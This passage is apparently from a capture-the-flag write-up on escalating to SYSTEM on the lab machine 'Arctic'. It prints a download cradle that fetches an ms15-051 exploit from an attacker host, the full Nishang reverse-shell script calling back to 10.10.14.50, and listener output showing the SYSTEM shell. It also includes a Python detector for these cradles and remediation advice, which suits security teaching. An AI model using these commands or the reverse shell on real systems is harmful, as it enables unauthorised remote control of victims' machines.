Now, similarly to before, let’s have PowerShell on the target system ‘Arctic’ download the file:
c:\Users\tolis\Desktop>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.50:8080/ms15-051.exe','C:\users\tolis\Desktop\ms15-051.exe')"
powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.50:8080/ms15-051.exe','C:\users\tolis\Desktop\ms15-051.exe')"
c:\Users\tolis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of c:\Users\tolis\Desktop
04/02/2020 03:33 �� <DIR> .
04/02/2020 03:33 �� <DIR> ..
04/02/2020 03:33 �� 55.296 ms15-051.exe
22/03/2017 09:01 �� 32 user.txt
2 File(s) 55.328 bytes
2 Dir(s) 33.184.419.840 bytes free
c:\Users\tolis\Desktop>
I also tried this exploit in my writeup of HTB ‘Bounty’ and you can find more info on how to use the exploit at this link. Essentially we need to pass another command to the executable that will be run with elevated privileges. There’s a good reverse TCP connect powershell script I like to use for this, I believe it’s part of the empire framework.
Here’s the script:
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.50 -Port 4444
running the exploit
Let’s copy it to our exploits directory as system.ps1, and serve the directory with SimpleHTTP again.
From here, we should be able to run the exploit exe (if it works) to have PowerShell on the ‘arctic’ system grab and execute the remote file system.ps1. This should call the Invoke-PowerShellTcp function of the script and, hopefully, send a root (SYSTEM) shell back to a listener of ours.
So let’s go ahead and start a local listener with nc -lvnp 4444, then execute the exploit to see what we get:
c:\Users\tolis\Desktop>.\ms15-051.exe "cmd.exe /c powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/system.ps1')"
.\ms15-051.exe "cmd.exe /c powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/system.ps1')"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1972 created.
==============================
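Both download cradles in this writeup (the Sherlock one-liner earlier and the ms15-051 launch just above) are loud from an endpoint-telemetry point of view: a web-service process spawning cmd.exe, PowerShell invoked with IEX/DownloadString, and a SYSTEM shell whose parent ran as tolis out of a user-writable directory. The following Python is an added example for this writeup, not code from the post: it replays that chain as constructed Sysmon-style process-creation records and applies four detection rules to them. jrun.exe as the ColdFusion 8 service binary is an assumption about a default install, and the ParentUser field assumes a Sysmon schema that reports it.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# They replay the chain from the writeup: the ColdFusion service hands a shell to the
# JSP payload, that shell runs the Sherlock download cradle, the ms15-051 launcher
# spawns a SYSTEM cmd.exe from tolis's Desktop, and that runs the second cradle.
# jrun.exe as the ColdFusion 8 service process is an assumption; the last record is
# ordinary admin activity and must not be flagged.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\ColdFusion8\runtime\bin\jrun.exe",
     "CommandLine": "cmd.exe",
     "User": r"ARCTIC\tolis", "ParentUser": r"ARCTIC\tolis"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.50:8080/Sherlock.ps1\')"',
     "User": r"ARCTIC\tolis", "ParentUser": r"ARCTIC\tolis"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\tolis\Desktop\ms15-051.exe",
     "CommandLine": "cmd.exe /c powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/system.ps1')",
     "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"ARCTIC\tolis"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/system.ps1')",
     "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
     "User": r"ARCTIC\tolis", "ParentUser": r"ARCTIC\tolis"},
]

SHELLS = ("cmd.exe", "powershell.exe")
WEB_PARENTS = ("jrun.exe",)          # assumption: ColdFusion 8 service binary
SYSTEM = "NT AUTHORITY\\SYSTEM"
# IEX/Invoke-Expression fed by DownloadString/DownloadData, or a DownloadFile drop:
# the cradles used in the writeup. PowerShell is case-insensitive, so match that way.
CRADLE_RE = re.compile(r"(iex|invoke-expression).*\.download(string|data)\(|\.downloadfile\(",
                       re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return the list of rule names an event trips (empty for benign events)."""
    child, parent = basename(event["Image"]), basename(event["ParentImage"])
    tags = []
    if child in SHELLS and parent in WEB_PARENTS:
        tags.append("web-service-spawned-shell")           # app server should not spawn shells
    if child in SHELLS and CRADLE_RE.search(event["CommandLine"]):
        tags.append("powershell-download-cradle")          # fetch-and-run from the network
    if child in SHELLS and event["User"].upper() == SYSTEM and event["ParentUser"].upper() != SYSTEM:
        tags.append("system-shell-from-non-system-parent")  # privilege jump across one hop
    if child in SHELLS and "\\users\\" in event["ParentImage"].lower():
        tags.append("shell-from-user-writable-parent")     # launcher dropped in a profile dir
    return tags


def scan(events):
    """Map event index -> tags for every event that trips at least one rule."""
    flagged = {}
    for i, ev in enumerate(events):
        tags = analyze(ev)
        if tags:
            flagged[i] = tags
    return flagged


if __name__ == "__main__":
    for idx, tags in scan(EVENTS).items():
        print(idx, basename(EVENTS[idx]["Image"]), "<-", basename(EVENTS[idx]["ParentImage"]), tags)
```

The third record is the one that matters most: it trips three rules at once (cradle, SYSTEM child of a tolis parent, launcher under C:\Users), which is the shape of a local privilege escalation regardless of which kernel bug was used. The first rule is the cheapest to deploy and would have fired at the very first shell, before any of the privesc steps.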
And checking our listener:
root@kali:/writeups/HTB/arctic/exploits# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.11] 49319
Windows PowerShell running as user tolis on ARCTIC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\tolis\Desktop>whoami
nt authority\system
Nice, we got Admin on Arctic! From here we can grab the root flag and call it a day:
PS C:\Users\tolis\Desktop> cd c:\users\Administrator\Desktop
PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 22/3/2017 9:02 ?? 32 root.txt
PS C:\users\Administrator\Desktop>
Conclusion
Recommended Remediations
- Update the ColdFusion install to help protect against known exploits, such as the arbitrary file upload & execution on ColdFusion 8.1.
- Patch the Windows system to protect against kernel exploits and other security vulnerabilities.
All for now; until next time.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!